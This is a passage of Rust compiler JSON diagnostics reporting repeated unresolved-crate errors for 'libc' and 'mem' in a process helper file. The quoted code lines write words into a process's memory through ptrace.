\u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:109:24\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let new_word = libc::c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let new_word = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m109\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let new_word = c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3483,"byte_end":3487,"line_start":112,"line_end":112,"column_start":43,"column_end":47,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":43,"highlight_end":47}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:112:43\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3504,"byte_end":3508,"line_start":112,"line_end":112,"column_start":64,"column_end":68,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":64,"highlight_end":68}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:112:64\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m112\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3570,"byte_end":3574,"line_start":113,"line_end":113,"column_start":53,"column_end":57,"is_primary":true,"text":[{"text":" ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;","highlight_start":53,"highlight_end":57}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:113:53\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m113\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `mem`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3911,"byte_end":3914,"line_start":123,"line_end":123,"column_start":29,"column_end":32,"is_primary":true,"text":[{"text":" let mut arr = [0u8; mem::size_of::()];","highlight_start":29,"highlight_end":32}],"label":"use of unresolved module or unlinked crate `mem`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::mem;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:123:29\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m123\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut arr = [0u8; mem::size_of::()];\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::mem;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3926,"byte_end":3930,"line_start":123,"line_end":123,"column_start":44,"column_end":48,"is_primary":true,"text":[{"text":" let mut arr = [0u8; mem::size_of::()];","highlight_start":44,"highlight_end":48}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:123:44\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m123\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut arr = [0u8; mem::size_of::()];\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4011,"byte_end":4015,"line_start":125,"line_end":125,"column_start":19,"column_end":23,"is_primary":true,"text":[{"text":" let val = libc::c_long::from_ne_bytes(arr);","highlight_start":19,"highlight_end":23}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":4011,"byte_end":4017,"line_start":125,"line_end":125,"column_start":19,"column_end":25,"is_primary":true,"text":[{"text":" let val = libc::c_long::from_ne_bytes(arr);","highlight_start":19,"highlight_end":25}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:125:19\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let val = libc::c_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let val = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let val = c_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4099,"byte_end":4103,"line_start":127,"line_end":127,"column_start":38,"column_end":42,"is_primary":true,"text":[{"text":" let ptr = &val as *const libc::c_long as *mut libc::c_void;","highlight_start":38,"highlight_end":42}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:127:38\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m127\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &val as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m 